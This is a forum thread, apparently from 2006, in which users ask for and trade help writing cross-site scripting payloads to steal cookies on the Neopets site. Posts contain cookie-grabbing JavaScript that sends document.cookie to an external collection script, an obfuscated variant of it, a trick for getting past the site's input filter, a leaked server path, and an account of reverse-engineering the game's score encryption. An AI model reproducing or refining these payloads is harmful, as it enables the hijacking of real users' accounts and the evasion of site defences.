20 replies to this topic

[indecaydk]

I wrote this exploit to grab cookies, but now TNT has blocked it. I was wondering if anyone could give me some help coding it more or re0writing it so their system wont block it. Thanks in advance

<body onFocus="cs='docu'.concat('men','t.','cook','ie');
cook=eval (cs);
URL='http://xss.awardspace.com/new/cgrab.php?c=';
location.href=URL.concat(escape(cook));">

[Apage43]

Mmm, I do wonder if these methods still work...

Apage: Does that still work? I'd like to know how the encryption was cracked.

The encryption was just reverse engineered. echeese used an actionscript decompiler on the flash file and ported the resulting code to php, then we screwed with the functions till we figured out how it actually used them, sniffed a score submission, decoded it, and figured out what it all meant.
I dunno if it still works, I haven't used it in a long time, I haven't played NP in over a year.
If the encryption's been changed I'm sure it's still vulnerable to the same method of decompiling and reversing.

[indecaydk]

ok well i spent some time trying to make this work but still nothing. I was wondering if someone could look over this and let me knowq what is wrong with it. thanks.

<body C=">" onLoad="test1 = new Array(5)
test1[0] = "document.location=String.fr";
test1[1] = "om.CharC";
test1[2] = "ode(39,109,97,108,46,97,119,97,114,100,115,112,97,99,101,46,99,111,109,47,99,103
,46,112,104,112,63,99,61,39)†doc";
test1[3] = "ument.co";
test1[4] = "okie";
document.write(test1[0],test1[1],test1[2],test1[3],test1[4],test1[5]); 
>

[kuza55]

They added some more entry filtering (and maybe some more defences against attacks once you've actually been able to execute Javascript), which sems to check that the number ot < and > signs in the input is the same, so something like:

<body C=">" onLoad="alert('hi');">

won't work, but:

<body C=">" onLoad="alert('hi');" X="<" >

will.....

[EDIT]: While trying a few more vectors (some of which worked, but there is no need to post them since the one above works), by some luck I came across this error message:

Fatal error: Unknown function: t me() in 

/home/neopets/public_html/include/global.functions.inc on line 1450

Which in itself doesn't mean anything, but the files exists, and while it doesn't actually show anything (just returns a blank page, must have configured the server to parse .inc files as .php files as well, or somthing similar), thats the location of the functions, so yeah, if it helps anyone *shrug*....

Edited by kuza55, 12 February 2006 - 11:13 PM.

[bigmac]

Guys, it appears as though neopets has entirely disallowed 'onfocus' and some of the other code we've been using.

[Tyler]

I can't believe it, I honestly find that so amusing that someone would take the time to write an exploit for Neopets. I will admit they were at hit at one time "back in the day when you could sell your accuonts for $$$" but now. haha and exploits. It just makes my day.